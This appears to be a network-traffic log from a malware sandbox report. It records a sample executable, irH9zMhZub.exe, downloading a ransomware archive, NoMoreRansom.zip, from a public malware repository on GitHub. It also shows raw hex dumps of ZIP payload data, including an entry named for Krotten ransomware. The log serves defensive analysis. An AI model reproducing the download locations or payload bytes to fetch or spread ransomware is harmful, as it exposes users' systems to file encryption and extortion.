                                                                                                                                                                                      2022-09-29 12:50:35 UTC1172INData Raw: 42 ed eb 45 40 35 67 37 57 46 41 1a 8a 91 83 30 af 50 3f d9 42 75 66 6c 9d 73 bb 34 17 69 bd 92 12 f2 8b 7a 42 97 0f de b6 07 f8 cf bd 92 f1 47 67 a9 73 96 54 96 75 5f bd f6 13 d3 60 68 cd c8 1b 33 72 2b ec bb c3 63 e5 2b 89 d6 d7 bf bc e0 88 28 b6 83 d0 41 3d 5b 82 76 86 6d 7d b9 3a 2c ae e1 10 96 7c 02 1b e3 46 ee 6d 55 66 26 bf 5f 18 dc 3f 01 d2 b0 03 d6 c4 4a 0b ec 37 25 9f 3f 5f f6 f0 7d a7 f9 44 23 83 a7 74 0d ce b3 18 44 0b 01 15 76 76 85 8b e0 a5 23 0e 02 41 86 8f be 4c b1 f8 71 78 d8 26 ea 36 2c 6e 94 15 10 a0 f7 bf 1b 0d 01 69 f2 ee 2d 06 3d 4e 71 19 74 a8 16 c8 44 4f f5 21 95 16 74 26 38 fb 43 c8 6b a9 3f 7c c5 00 17 4f e2 6b 10 6b cb 63 41 3d 11 8f d0 31 43 46 38 16 50 5d 58 5b 84 7f 0a a2 d0 36 c5 e9 98 80 d2 b8 5e f8 f2 37 4c 11 7f 08 db e3
                                                                                                                                                                                      Data Ascii: BE@5g7WFA0P?Bufls4izBGgsTu_`h3r+c+(A=[vm}:,|FmUf&_?J7%?_}D#tDvv#ALqx&6,ni-=NqtDO!t&8Ck?|OkkcA=1CF8P]X[6^7L
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1174INData Raw: 1f d2 bf af bb ab 3f fc ee d8 b7 6b 90 7a 92 89 d2 1b 17 4a bb ee 58 52 e7 b3 02 5f 6a 3e ac b4 d5 f6 67 a1 b1 13 0b 5a cf 82 3c a4 a4 58 fa 2d b0 68 46 3e ac 26 fd c9 f1 45 68 27 09 69 f6 57 b4 f1 9f 74 9d 29 92 b6 2d cc e0 4f 92 f8 32 e8 30 d1 88 ce ee 93 f5 84 75 d3 47 60 3c 07 bc 20 19 ad dc b6 26 ab 26 92 50 6e ff b7 ca a5 ce 19 f2 1f 99 16 63 93 d8 a0 48 eb bc 52 a4 f1 06 5c 0a 58 20 e1 c0 85 12 8d 1c 12 d3 cc 8b bd aa 83 13 1b d7 f3 b7 78 fa 32 9d 59 06 ad 47 15 65 ac 71 94 34 2b 31 c4 76 9c 2e 7b 12 c9 97 56 fb 85 16 81 85 bf ac 48 28 fe 53 64 68 61 7a 58 82 66 51 27 c4 6f c9 48 17 64 4a fb 96 3b 6d ac b1 06 25 33 cf 16 d9 3e 34 32 9a ab 14 f0 69 75 14 8d d4 de 44 20 c1 88 e9 d2 a1 75 d8 9d e1 56 41 99 c3 be b0 26 e1 94 6d a5 e7 b8 f9 31 ae ba 32
                                                                                                                                                                                      Data Ascii: ?kzJXR_j>gZ<X-hF>&Eh'iWt)-O20uG`< &&PncHR\X x2YGeq4+1v.{VH(SdhazXfQ'oHdJ;m%3>42iuD uVA&m12
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1175INData Raw: c6 ac 9f 9c 59 df 28 43 2b eb 1c db 64 c8 8f a2 cd 3a 7a 3b fc 2f 74 e4 9e 7e 55 12 84 4a d6 f6 5e a5 6e d4 79 c4 e3 ef 8d 5e e2 57 26 83 31 66 76 9c 4e d8 6a 42 57 8b 30 74 d3 54 ab 8c 8a 93 cf 03 18 36 9d 6f db ea 0a 1e 49 a2 2d 97 78 c5 28 b6 39 39 f5 c6 d4 e8 b6 85 52 b6 c3 61 17 49 4a 72 46 e9 31 07 e4 c9 0b e4 11 7e a4 3e 03 06 37 81 36 56 8b e4 fe 48 a9 2b 72 da 59 c7 9d 68 fe 44 d1 40 db 97 db 7b 94 45 29 a0 8a 8c 95 3f ac 36 14 e7 d1 b6 b8 81 7f 36 da a5 e4 68 17 46 15 bd 2a f5 d5 d4 31 a7 ba 4a 26 7d e4 94 fe 5f 36 7d dd df 4b 14 2e c6 c6 c5 b4 e1 40 0f ae a7 9e 9d 69 b9 ee 77 58 80 6a 85 70 45 02 73 b6 b2 ed 74 14 72 c9 d1 17 45 ae be 68 78 44 3b 93 0f 40 fc 40 a1 f2 3d 49 51 da 85 dc 67 04 a2 87 04 14 c5 bb dd a8 8a 04 cc f3 3d e2 e1 c3 a9 41
                                                                                                                                                                                      Data Ascii: Y(C+d:z;/t~UJ^ny^W&1fvNjBW0tT6oI-x(99RaIJrF1~>76VH+rYhD@{E)?66hF*1J&}_6}K.@iwXjpEstrEhxD;@@=IQg=A
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1176INData Raw: 0d cf e4 fb f2 6f 7b 65 d3 fd a4 b2 64 d9 18 42 3d 98 97 14 4b fd 61 fa 15 8b 72 0e 61 e8 87 be d0 8f a1 76 24 9f 06 f0 78 ad 73 a5 10 81 8d ec 4a 89 98 bf b4 5a 63 8a fc 8b cd 60 f4 b2 5b 97 f7 23 89 43 55 23 fb 8d 5d a1 3f 3c c2 f8 3d 7c de 4a 0d ea c5 ff 56 3b cb 5e a2 34 ff 5c 2b 0c 05 b1 66 3a ee 43 08 c9 f7 ac 4e 28 9d 39 1d b4 20 cc 32 26 2a 7e ca 47 5c 65 b6 6b 1f 9c 4e 2a 24 7d 0f d9 75 9b ac 6e 79 05 71 83 07 01 42 33 e5 01 7c fc f0 1a 5c 63 14 3e ad 02 32 ba 4c ac c4 84 69 f9 0d d0 81 b2 19 9c 3b 18 4b a6 e0 d1 59 01 24 bb 14 b7 8f 6f be 9f 1f 4d 65 0a af b7 a6 e5 55 34 7c e7 5f 04 fd fd d5 c4 37 67 93 d2 28 7a 10 d6 d6 1d 38 d9 d0 1e 7f 3e 7a a1 2b 83 b8 93 86 c4 ff 7a d9 f4 ad 0d 8d 71 9a b9 92 d5 ec 74 46 02 c0 70 87 5c e9 47 a7 06 30 7f d2
                                                                                                                                                                                      Data Ascii: o{edB=Karav$xsJZc`[#CU#]?<=|JV;^4\+f:CN(9 2&*~G\ekN*$}unyqB3|\c>2Li;KY$oMeU4|_7g(z8>z+zqtFp\G0
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1178INData Raw: 6b 4a 84 b3 23 2b 5e 0c 14 ad f7 8e 38 63 a4 30 d3 90 b9 fc 09 56 32 27 06 c0 82 72 33 f2 82 72 4a b8 32 88 c3 29 05 d6 2f e1 5e ff 7f 22 20 f8 65 c6 d2 8d 2a 6a 98 73 2c 30 a0 3b 7e 37 c4 92 09 e0 7e 6c 61 18 67 32 6b fb c7 8d c1 17 d5 75 7d 3c 3a 99 f5 c8 38 09 82 a6 c3 75 fa b9 9b 8e da 5a 50 4c 75 39 e6 21 ec c0 f3 c5 b1 ae 5e d8 df 10 f1 5b ab 53 dc 60 28 b0 f7 4e 58 3c 9b 19 0f 24 88 ac 3d ae 91 6a 91 7e dc 3d 3d 23 0d 1f 0c 7e e4 20 e4 70 af 87 0a 00 2e f4 c1 20 a9 b6 af ce fc c7 8f 56 ca bf cb 85 78 de eb e2 d8 18 08 58 7f 17 b9 81 01 4a e9 cd ba 79 4f 63 b2 72 79 26 dd 8c 30 f0 a5 95 01 82 63 0d b7 32 b7 1d 28 2e 6e 87 be 62 76 0c 6a 68 ae 4f db c6 43 43 d1 68 b7 13 f2 b4 0d 84 cf 70 50 7b 53 17 ab 97 52 c7 49 72 6f 42 82 67 de 18 23 d6 10 bc 21
                                                                                                                                                                                      Data Ascii: kJ#+^8c0V2'r3rJ2)/^" e*js,0;~7~lag2ku}<:8uZPLu9!^[S`(NX<$=j~==#~ p. VxXJyOcry&0c2(.nbvjhOCChpP{SRIroBg#!
                                                                                                                                                                                      2022-09-29 12:50:35 UTC1179INData Raw: aa 77 e9 3e b9 5b d3 c3 94 de e2 a3 bd cc fb 37 9f 00 da 4e cd bf 71 81 4c f9 02 f4 fd 6f 4b 87 35 1e 7f e5 12 50 23 d3 50 4b 01 02 3f 00 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 3f b1 a7 fb dd c8 01 a6 0c 3e 45 f0 03 d4 01 a6 0c 3e 45 f0 03 d4 01 01 99 07 00 02 00 41 45 03 08 00 50 4b 05 06 00 00 00 00 01 00 01 00 73 00 00 00 6e 66 00 00 00 00
                                                                                                                                                                                      Data Ascii: w>[7NqLoK5P#PK?3c8/f)/ Endermanch@Krotten.exe ?>E>EAEPKsnf


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.6 | 49759 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:51:24 UTC | 1179 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                                                      Host: github.com
2022-09-29 12:51:24 UTC | 1179 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:51:14 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:51:24 UTC | 1180 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.6 | 49760 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:51:24 UTC | 1182 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
2022-09-29 12:51:24 UTC | 1182 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 938498
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "a8e6304ff5320ec60c4e2f8e3ebb31e42a5adf4691dfa4eaa6f24b4dad08bbfd"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: D4EA:67BC:3D674:FA8B9:63359346
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:51:24 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6948-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455885.821877,VS0,VE2
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: b309f3b971f31fe73ea16cd5a67011417ee54a29
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:56:24 GMT
                                                                                                                                                                                      Source-Age: 1
                                                                                                                                                                                      Data Ascii: !~]G;rZcoJMB^b+$V_yg.;Iq<kui`u`Y>v+c26X&e}rT.44<b=KU+TbM<z~LTYRW/{0w7.ve,Z}B&.JB$dF$4{Ee*]BZZy7:9zdBj
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1187INData Raw: 98 b9 e5 68 92 db 22 0b b1 fa 44 78 da 49 85 45 85 17 60 35 10 c6 09 55 93 f7 24 4f ea ee 81 7c 8c 8a 0e f9 8a 94 96 cd 94 70 2e ae 14 70 60 ca e9 b6 89 56 a9 e9 f6 9c ff f8 f1 93 80 46 9c 86 ef 5a 05 41 02 64 14 08 73 07 99 b9 97 1a 8c 78 9f d8 1a 0f 0a da c4 dd 91 36 30 11 a8 17 b2 cf 5c ff 1e 84 e9 7b 2d 26 93 dd 77 34 5b 6e 5f f7 5e 64 14 8d 31 57 21 c2 99 fe 03 87 2d 9f fd 7f 15 a6 c5 9d ba 81 6d a0 b9 d2 bc 29 81 a5 25 bf ce 3a 91 cd 44 61 c1 8d ef be 1d b7 20 69 6d 2c 9d d2 f0 cf 51 00 d4 2d 1d 5e c6 dd ac 4f 43 3e c1 12 31 b3 8d 39 e1 fb 85 2b 32 d7 65 0b 8c bb ef cb 71 4b fa ba 96 1c 1d 25 85 25 e2 28 4b 43 db 04 43 84 5a 53 94 88 f5 14 40 55 70 6d 3d 8c cc d2 bf 89 06 df 49 26 4f f6 ce f7 7f a1 77 f1 a1 43 2c 89 2c f3 78 57 95 25 cb 51 0f fb 57
                                                                                                                                                                                      Data Ascii: h"DxIE`5U$O|p.p`VFZAdsx60\{-&w4[n_^d1W!-m)%:Da im,Q-^OC>19+2eqK%%(KCCZS@Upm=I&OwC,,xW%QW
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1188INData Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5
                                                                                                                                                                                      Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3|
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1189INData Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9
                                                                                                                                                                                      Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku*&*sG)^@R.O$bXV$zjkN~Mctn?T ? 8t||\HDmj*P3l@>G[ jmZF{`\G&A7Ir
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1191INData Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8
                                                                                                                                                                                      Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO|bJcx@rv7XzDXwn>-J,m^bNA|d+o}}+E8Eb
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1192INData Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42
                                                                                                                                                                                      Data Ascii: gTIe==49;:& k&@O*.uRsBtM;0mJ`2z`6G*QXR}oddu|.hCY|~HI+D9@-FO$vW"H|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]|zr{eB
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1193INData Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5
                                                                                                                                                                                      Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1195INData Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9
                                                                                                                                                                                      Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1196INData Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c
                                                                                                                                                                                      Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1197INData Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a
                                                                                                                                                                                      Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG*;T*dU1L/F^Vp
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1198INData Raw: c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2 9b 2a 7f
                                                                                                                                                                                      Data Ascii: 2\22Y1*tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]S*FHzhk;!XUIP#khCOwu/P*
                                                                                                                                                                                      2022-09-29 12:51:24 UTC1214INData Raw: ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1 b4 81 18
                                                                                                                                                                                      Data Ascii: ~.qrRSOiIaHCkL@^*? vWO*'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
